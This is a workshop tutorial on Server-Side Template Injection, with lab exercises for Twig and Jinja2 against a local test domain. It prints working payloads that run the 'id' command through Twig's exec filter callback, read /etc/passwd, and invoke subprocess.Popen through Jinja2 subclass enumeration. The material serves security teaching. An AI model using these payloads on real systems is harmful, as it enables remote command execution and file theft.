Master Server‑Side Template Injection: Hands‑On Labs with Twig & Jinja2

1. Introduction

Template injection, also known as Server‑Side Template Injection (SSTI), is a class of security vulnerabilities discovered in 2015. James Kettle’s Black Hat talk laid the foundation for exploiting many template engines. Exploiting these flaws requires knowledge of the target template library or language.

This article introduces SSTI, explores attack patterns, and provides five vulnerable template engines with exercises exposing each engine.

Required Software

The only requirement is an HTTP intercepting proxy such as Burp Suite or OWASP ZAP.

Running the Applications

Download the code, read the README for build instructions, and start the applications with Docker‑Compose.

$ git clone https://github.com/GoSecure/template-injection-workshop
$ docker-compose up

Optional DNS Configuration

Add the following line to your hosts file to resolve the test domain:

127.0.0.1 template-injection.gosec.co

2. Template Injection

Template engines render static templates with dynamic values, producing HTML for the client. SaaS platforms often expose template libraries directly, making them powerful targets.

Data Binding Example

Hello {{firstName}} {{lastName}}!

Nested attribute example:

Hello {{user.firstName}} {{user.lastName}}!

Thinking Outside the Box

Attackers exploit field access, function calls, and other engine features to read files, execute commands, or manipulate internal state.

3. Identifying Template Engines

Many languages have dozens of template libraries. Focus on the most popular ones for a given language, e.g., Twig for PHP, Jinja2 for Python, etc.

Heuristic Methods

Use confidence‑based testing and payload adjustments rather than blind brute‑force.

4. LAB 1: Twig (PHP)

Twig is the most popular PHP template engine, used by Symfony and Craft CMS.

Basic Syntax

Hello {{ var }}
Hello {{ var|escape }}

Attack Surface

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

Exercise: connect to http://template-injection.gosec.co:8012/ and submit a simple expression such as {{1338-1}} which should render 1337. Use the payload above to execute the id command and read flag.txt.

5. LAB 2: Jinja2 (Python)

Jinja2 is a popular Python template engine.

Basic Syntax

{{ message }}
{{ foo.bar }}
{{ foo['bar'] }}

Attack Surface

Access class objects, MRO, subclasses, and invoke methods to read files or execute commands.

{{''. __class__.__mro__[2].__subclasses__()[40]("/etc/passwd","r").read()}}

Subprocess.Popen can be reached via subclass enumeration:

{{[].__class__.__mro__[1].__subclasses__()[245]('ls /',shell=True,stdout=-1).communicate()[0].strip()}}

Exercise: connect to http://template-injection.gosec.co:8013/ and use arithmetic to discover the vulnerable parameter, then exploit the engine to read flag.txt.

Conclusion

The article covered SSTI concepts, engine identification, and hands‑on labs for Twig and Jinja2, with more labs to follow.